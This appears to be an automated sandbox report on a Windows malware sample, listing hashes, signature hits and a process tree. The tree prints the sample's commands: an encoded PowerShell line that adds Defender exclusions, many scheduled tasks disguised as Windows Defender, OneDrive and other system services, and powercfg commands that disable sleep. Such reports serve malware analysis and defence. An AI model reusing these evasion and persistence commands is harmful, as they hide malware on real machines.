Analysis
-
max time kernel
134s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2022 16:32
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
windows7-x64
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220812-en
windows10-2004-x64
6 signatures
150 seconds
General
-
Target
file.exe
-
Size
3.2MB
-
MD5
502b810b213e6ea11cebaa86737c6f26
-
SHA1
9180f07a4cf3fea9b08e6e1828fb1b8d05805975
-
SHA256
be7ba15c274112b511952287bd01a6c135e7b20260f307fc72fcd1a948188086
-
SHA512
2ed47486212f832fc8c3f3f85137e489c7d6fe4b893acc74910362830ce778a6eab13ce95554f984028cc0953329b799d318df1088b94f7930db0e8a5a987e78
-
SSDEEP
12288:GNpYYoU9aGbHRFbOuuWompGy4y5vKk8U9tXnt9q:mpYVU9FP
Score
6/10
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4436 4352 WerFault.exe schtasks.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4352 schtasks.exe 400 schtasks.exe 3624 schtasks.exe 2148 schtasks.exe 1584 schtasks.exe 1212 schtasks.exe 4680 schtasks.exe 932 schtasks.exe 4628 schtasks.exe 4500 schtasks.exe 3808 schtasks.exe 2532 schtasks.exe 1316 schtasks.exe 4076 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
file.exepowershell.exepid process 764 file.exe 1464 powershell.exe 1464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
file.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 764 file.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeShutdownPrivilege 3164 powercfg.exe Token: SeCreatePagefilePrivilege 3164 powercfg.exe Token: SeShutdownPrivilege 3608 powercfg.exe Token: SeCreatePagefilePrivilege 3608 powercfg.exe Token: SeShutdownPrivilege 2060 powercfg.exe Token: SeCreatePagefilePrivilege 2060 powercfg.exe Token: SeShutdownPrivilege 4068 powercfg.exe Token: SeCreatePagefilePrivilege 4068 powercfg.exe Token: SeShutdownPrivilege 2088 powercfg.exe Token: SeCreatePagefilePrivilege 2088 powercfg.exe Token: SeShutdownPrivilege 2088 powercfg.exe Token: SeCreatePagefilePrivilege 2088 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 764 wrote to memory of 3436 764 file.exe cmd.exe PID 764 wrote to memory of 3436 764 file.exe cmd.exe PID 764 wrote to memory of 3436 764 file.exe cmd.exe PID 3436 wrote to memory of 1464 3436 cmd.exe powershell.exe PID 3436 wrote to memory of 1464 3436 cmd.exe powershell.exe PID 3436 wrote to memory of 1464 3436 cmd.exe powershell.exe PID 764 wrote to memory of 5028 764 file.exe cmd.exe PID 764 wrote to memory of 5028 764 file.exe cmd.exe PID 764 wrote to memory of 5028 764 file.exe cmd.exe PID 764 wrote to memory of 1728 764 file.exe cmd.exe PID 764 wrote to memory of 1728 764 file.exe cmd.exe PID 764 wrote to memory of 1728 764 file.exe cmd.exe PID 764 wrote to memory of 1276 764 file.exe cmd.exe PID 764 wrote to memory of 1276 764 file.exe cmd.exe PID 764 wrote to memory of 1276 764 file.exe cmd.exe PID 764 wrote to memory of 4612 764 file.exe cmd.exe PID 764 wrote to memory of 4612 764 file.exe cmd.exe PID 764 wrote to memory of 4612 764 file.exe cmd.exe PID 764 wrote to memory of 432 764 file.exe cmd.exe PID 764 wrote to memory of 432 764 file.exe cmd.exe PID 764 wrote to memory of 432 764 file.exe cmd.exe PID 764 wrote to memory of 1716 764 file.exe cmd.exe PID 764 wrote to memory of 1716 764 file.exe cmd.exe PID 764 wrote to memory of 1716 764 file.exe cmd.exe PID 764 wrote to memory of 2616 764 file.exe cmd.exe PID 764 wrote to memory of 2616 764 file.exe cmd.exe PID 764 wrote to memory of 2616 764 file.exe cmd.exe PID 764 wrote to memory of 3776 764 file.exe cmd.exe PID 764 wrote to memory of 3776 764 file.exe cmd.exe PID 764 wrote to memory of 3776 764 file.exe cmd.exe PID 764 wrote to memory of 228 764 file.exe cmd.exe PID 764 wrote to memory of 228 764 file.exe cmd.exe PID 764 wrote to memory of 228 764 file.exe cmd.exe PID 764 wrote to memory of 216 764 file.exe cmd.exe PID 764 wrote to memory of 216 764 file.exe cmd.exe PID 764 wrote to memory of 216 764 file.exe cmd.exe PID 764 wrote to memory of 1512 764 file.exe cmd.exe PID 764 wrote to memory of 1512 764 file.exe cmd.exe PID 764 wrote to memory of 1512 764 file.exe cmd.exe PID 764 wrote to memory of 1904 764 file.exe cmd.exe PID 764 wrote to memory of 1904 764 file.exe cmd.exe PID 764 wrote to memory of 1904 764 file.exe cmd.exe PID 764 wrote to memory of 3712 764 file.exe cmd.exe PID 764 wrote to memory of 3712 764 file.exe cmd.exe PID 764 wrote to memory of 3712 764 file.exe cmd.exe PID 764 wrote to memory of 4444 764 file.exe cmd.exe PID 764 wrote to memory of 4444 764 file.exe cmd.exe PID 764 wrote to memory of 4444 764 file.exe cmd.exe PID 5028 wrote to memory of 1212 5028 cmd.exe schtasks.exe PID 5028 wrote to memory of 1212 5028 cmd.exe schtasks.exe PID 5028 wrote to memory of 1212 5028 cmd.exe schtasks.exe PID 4612 wrote to memory of 4352 4612 cmd.exe schtasks.exe PID 4612 wrote to memory of 4352 4612 cmd.exe schtasks.exe PID 4612 wrote to memory of 4352 4612 cmd.exe schtasks.exe PID 432 wrote to memory of 3624 432 cmd.exe schtasks.exe PID 432 wrote to memory of 3624 432 cmd.exe schtasks.exe PID 432 wrote to memory of 3624 432 cmd.exe schtasks.exe PID 3776 wrote to memory of 3808 3776 cmd.exe schtasks.exe PID 3776 wrote to memory of 3808 3776 cmd.exe schtasks.exe PID 3776 wrote to memory of 3808 3776 cmd.exe schtasks.exe PID 2616 wrote to memory of 2148 2616 cmd.exe schtasks.exe PID 2616 wrote to memory of 2148 2616 cmd.exe schtasks.exe PID 2616 wrote to memory of 2148 2616 cmd.exe schtasks.exe PID 216 wrote to memory of 400 216 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGUAawBtAG0ATgBaAHMARgBGAGcAdQBaAFEAawAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAAOABHAG0AdgA0AGUANgBhADYAOABKAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEYAaAAwAEMAZwBpAGUAaAA0AEEAZwBnAEcAawB1ACMAPgAgAEAAKAAgADwAIwBaAHoAUQB0AFgAYQBIACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBTADQAOABtAGsAbwBPAGsAaQBIAGEANgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcgBMAGQAUQBPAGQAZQBoAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMQBIAEoAaABDADEAWgAjAD4A"2⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAawBtAG0ATgBaAHMARgBGAGcAdQBaAFEAawAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAAOABHAG0AdgA0AGUANgBhADYAOABKAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEYAaAAwAEMAZwBpAGUAaAA0AEEAZwBnAEcAawB1ACMAPgAgAEAAKAAgADwAIwBaAHoAUQB0AFgAYQBIACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBTADQAOABtAGsAbwBPAGsAaQBIAGEANgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcgBMAGQAUQBPAGQAZQBoAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMQBIAEoAaABDADEAWgAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo еш & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo юt2⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:1212 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo ХЖя & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo АИБv0АеГипkЬуп62⤵PID:1728
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:932 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo nрфsAPN3900 & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo кАДЩSKGRUиv2⤵PID:1276
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:4680 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo ъиvAhгe9JхhyOех & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo дшчa5ТIЪиI2⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:4352 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 4764⤵
- Program crash
PID:4436 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo CTozX6ЪщйtnV & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo VЯIСШт9ЗитсЗdvLа2P2⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:3624 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo НЖЩpuVэб9И & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo W2⤵PID:1716
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:4628 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo vбпксPeБЕШ & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo о1WTKгСiХв2⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:2148 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo eзШnзqЬaВоQ & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo лK2⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:3808 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo КЖnLуanL8ю & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_M3ЧcbшСъмhифЦЛbЕСПM" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo бjЙУd2⤵PID:228
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_M3ЧcbшСъмhифЦЛbЕСПM" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:4500 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo еmъЭHPTъХгhЪрЕyiф9h & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_RYцBu1" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 6GD2⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_RYцBu1" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:400 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo wБgdЫЮКНWCwj6 & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_nFкjж9GмсаqыTУ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo sЛOфФРЫхЦRjЩсяnv2⤵PID:1512
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_nFкjж9GмсаqыTУ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:1584 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo eйgwдW & SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_Й27K3ОGрbСD" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo В8пФGэ2⤵PID:1904
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_Й27K3ОGрbСD" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:1316 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo LJюЩrрA2снОоtАЩ & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ШrИsBЖuфЫтУ2⤵PID:4444
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164 -
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3608 -
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2060 -
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4068 -
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2088 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:4076 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo бфэзdф3ШщАиж9уь & SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_ZZщrАl3ГЙ3ЕMФ0дГ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЛдajА4мЮkс2⤵PID:3712
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_ZZщrАl3ГЙ3ЕMФ0дГ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f3⤵
- Creates scheduled task(s)
PID:2532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4352 -ip 43521⤵PID:2428